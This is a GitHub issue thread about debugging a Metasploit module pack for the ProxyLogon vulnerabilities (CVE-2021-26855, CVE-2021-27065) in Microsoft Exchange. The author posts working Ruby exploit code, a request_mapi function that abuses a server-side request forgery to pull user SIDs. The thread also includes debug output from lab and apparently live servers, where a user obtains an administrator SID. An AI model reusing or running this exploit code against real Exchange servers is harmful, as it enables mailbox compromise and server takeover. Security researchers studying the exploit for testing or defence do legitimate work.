search

mekhalleh / exchange_proxylogon

Module pack for #ProxyLogon (part. of my contribute for Metasploit-Framework) [CVE-2021-26855 && CVE-2021-27065]
4 stars 3 forks source link

Exploit aborted due to failure: unknown: No 'SID' was found #1

Closed Q1984 closed 3 years ago

Q1984 commented 3 years ago

It means the server is theoretically vulnerable but really no?

mekhalleh commented 3 years ago

Hard to say without more than that.

Try with the last modification I just pushed.

Q1984 commented 3 years ago

Still no luck. Still the same:

[*] https://xx.xx.xx.xx:443 - Sending mapi request [-] Exploit aborted due to failure: unknown: No 'SID' was found

Q1984 commented 3 years ago

Probably a manually SID option solves the issue?

mekhalleh commented 3 years ago

Yes. but isn't normal. what is the server version ? windows + exchange ?

can you replace the request_mapi function by : 

  def request_mapi(server_name, legacy_dn, server_id)
    data = "#{legacy_dn}\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
    headers = {
      'X-Requesttype' => 'Connect',
      'X-Requestid' => '{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456',
      'X-Clientinfo' => '{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}',
      'X-Clientapplication' => datastore['MapiClientApp']
    }

    sid = ''
    response = send_http(
      'POST',
      "Admin@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~1942062522",
      data,
      'application/mapi-http',
      headers
    )
    if response.code == 200
      sid_regex = /S-[0-9]{1}-[0-9]{1}-[0-9]{2}-[0-9]{10}-[0-9]{9}-[0-9]{10}-[0-9]{3,4}/
      sid = response.body.match(sid_regex)
    end

    print_status(" DEBUG --> respcode: #{response.code}")
    print_status(" DEBUG --> body:\n#{response.body}")

    fail_with(Failure::Unknown, 'No \'SID\' was found') if sid.to_s.empty?

    sid
  end
mekhalleh commented 3 years ago

my result is:

[*] https://172.20.2.110:443 - Sending mapi request
[*]  DEBUG --> respcode: 200
[*]  DEBUG --> body:
PROCESSING
DONE
X-StartTime: Mon, 15 Mar 2021 15:08:52 GMT
X-ElapsedTime: 15

����Cexch2k16.pwned.laF
                      �KClientAccessServer=exch2k16.pwned.lab,ConnectTime=15/03/2021 19:08:52,ConnectionID=48

�
 $IMicrosoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto' with SID S-1-5-21-3756917241-677735496-3570881102-1141 and MasterAccountSid  (StoreError=LoginPerm)
   at Microsoft.Exchange.RpcClientAccess.Server.UserManager.User.CorrelateIdentityWithLegacyDN(ClientSecurityContext clientSecurityContext)
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.<>c__DisplayClassc.<EcDoConnectEx>b__8()
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.Execute(Func`1 getExecuteParameters, Func`1 executeDelegate, Action`1 exceptionSerializationDelegate)

and the sid id: SID S-1-5-21-3756917241-677735496-3570881102-1141

mekhalleh commented 3 years ago

I'v fix the SID regex match. can you test too ? please.

Q1984 commented 3 years ago

https://xx.xx.xx.xx:443 - Sending mapi request [] sid: S-1-5-21-3956313580-2287587897-2401987453-500 (administrator@xxxx.xx) [*] https://xx.xx.xx.xx:443 - Sending ProxyLogon request [-] Exploit failed: NoMethodError undefined method `empty?' for #<MatchData "S-1-5-21-3956313580-2287587897-2401987453-500">

mekhalleh commented 3 years ago

yep. I'm working on ;)

Q1984 commented 3 years ago

App: Exchange Server 2013 CU11 (15.0.1156.6) OS: windows 2012

mekhalleh commented 3 years ago

Normally, last update work fine.